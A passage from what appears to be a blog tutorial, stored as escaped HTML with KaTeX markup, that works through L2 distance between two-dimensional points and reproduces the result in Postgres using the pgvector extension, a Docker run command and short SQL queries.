style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;7&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.4231070000000003em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot; style=&quot;margin-right:0.03588em;&quot;&gt;q&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:-0.03588em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; 
style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.30110799999999993em;&quot;&gt;&lt;span style=&quot;top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.15em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; 
style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;8&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8641079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.113em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-0.8486769999999999em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord sqrt&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.9144300000000001em;&quot;&gt;&lt;span class=&quot;svg-align&quot; style=&quot;top:-3em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot; style=&quot;padding-left:0.833em;&quot;&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;9&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.8744300000000003em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;hide-tail&quot; 
style=&quot;min-width:0.853em;height:1.08em;&quot;&gt;&lt;svg width=&quot;400em&quot; height=&quot;1.08em&quot; viewBox=&quot;0 0 400000 1080&quot; preserveAspectRatio=&quot;xMinYMin slice&quot;&gt;&lt;path d=&quot;M95,702
c-2.7,0,-7.17,-2.7,-13.5,-8c-5.8,-5.3,-9.5,-10,-9.5,-14
c0,-2,0.3,-3.3,1,-4c1.3,-2.7,23.83,-20.7,67.5,-54
c44.2,-33.3,65.8,-50.3,66.5,-51c1.3,-1.3,3,-2,5,-2c4.7,0,8.7,3.3,12,10
s173,378,173,378c0.7,0,35.3,-71,104,-213c68.7,-142,137.5,-285,206.5,-429
c69,-144,104.5,-217.7,106.5,-221
l0 -0
c5.3,-9.3,12,-14,20,-14
H400000v40H845.2724
s-225.272,467,-225.272,467s-235,486,-235,486c-2.7,4.7,-9,7,-19,7
c-6,0,-10,-1,-12,-3s-194,-422,-194,-422s-65,47,-65,47z
M834 80h400000v40h-400000z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.12556999999999996em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:0.6513230000000014em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:4.311323000000002em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;col-align-l&quot;&gt;&lt;span class=&quot;vlist-t vlist-t2&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:4.811323000000001em;&quot;&gt;&lt;span style=&quot;top:-6.971323000000001em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;7&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-5.471323em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; 
style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;8&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-3.947215em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;9&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-2.4231070000000003em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:-0.8486769999999999em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;≈&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span 
class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;top:0.6513230000000014em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:3em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;≈&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-s&quot;&gt;​&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:4.311323000000002em;&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;That&#39;s it. That&#39;s all the maths&lt;sup class=&quot;footnote-ref&quot;&gt;&lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fn3&quot; id=&quot;fnref3&quot;&gt;[3]&lt;/a&gt;&lt;/sup&gt;. We can see the &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;d&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.69444em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;d&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; value is much greater between &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span 
class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3, 4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;.&lt;/p&gt;
&lt;p&gt;Now, let&#39;s fling all this into a vector database. There are dozens to choose from but, for simplicity, I am going to use reliable, friendly Postgres and its &lt;a href=&quot;https://github.com/pgvector/pgvector&quot;&gt;&lt;code&gt;pgvector&lt;/code&gt;&lt;/a&gt; extension. The team makes a pre-cooked installation available via Docker, so we can spin it up locally:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ docker run &#92;
    --name pgvector &#92;
    -e POSTGRES_PASSWORD=vector &#92;
    -d &#92;
    -p 5432:5432 &#92;
    --rm &#92;
    pgvector/pgvector:pg16
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then feed it the relevant SQL. Our &lt;code&gt;vector(2)&lt;/code&gt; column type will receive two-dimensional vectors, and we&#39;ll &lt;code&gt;INSERT&lt;/code&gt; &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; and &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; 
style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; as vectors into it.&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; EXTENSION vector&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLE&lt;/span&gt; vectors &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id BIGSERIAL &lt;span class=&quot;token keyword&quot;&gt;PRIMARY&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;KEY&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; vector vector&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; vectors &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;vector&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;VALUES&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&#39;[4,4]&#39;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&#39;[-4,-4]&#39;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now we can query the database directly for the L2 distances from &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; with the &lt;code&gt;&amp;lt;-&amp;gt;&lt;/code&gt; operator.&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt; vectors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;vector &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Vector&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;       vectors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;vector &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&#39;[3,4]&#39;&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Distance From [3,4]&quot;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; vectors&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which returns the exact same results as our calculations earlier:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style=&quot;text-align:left&quot;&gt;&lt;/th&gt;
&lt;th style=&quot;text-align:left&quot;&gt;Vector&lt;/th&gt;
&lt;th style=&quot;text-align:left&quot;&gt;Distance From [3,4]&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;text-align:left&quot;&gt;1&lt;/td&gt;
&lt;td style=&quot;text-align:left&quot;&gt;[4,4]&lt;/td&gt;
&lt;td style=&quot;text-align:left&quot;&gt;1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;text-align:left&quot;&gt;2&lt;/td&gt;
&lt;td style=&quot;text-align:left&quot;&gt;[-4,-4]&lt;/td&gt;
&lt;td style=&quot;text-align:left&quot;&gt;10.63014581273465&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
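&lt;p&gt;For a sanity check that doesn&#39;t lean on &lt;code&gt;pgvector&lt;/code&gt; at all, the same sums can be written out by hand in plain SQL. This is only a sketch: it assumes nothing more than Postgres&#39;s built-in &lt;code&gt;sqrt&lt;/code&gt; and &lt;code&gt;power&lt;/code&gt; functions, and the column aliases are invented for illustration.&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;-- L2 distance from (3,4) to each stored point, written out by hand
SELECT sqrt(power(3 - 4, 2) + power(4 - 4, 2))       AS d_to_4_4,
       sqrt(power(3 - (-4), 2) + power(4 - (-4), 2)) AS d_to_minus_4_minus_4;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first column works out to the square root of 1 and the second to the square root of 113, which is roughly 10.63.&lt;/p&gt;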
&lt;p&gt;Cool! Mathematics wins again!&lt;/p&gt;
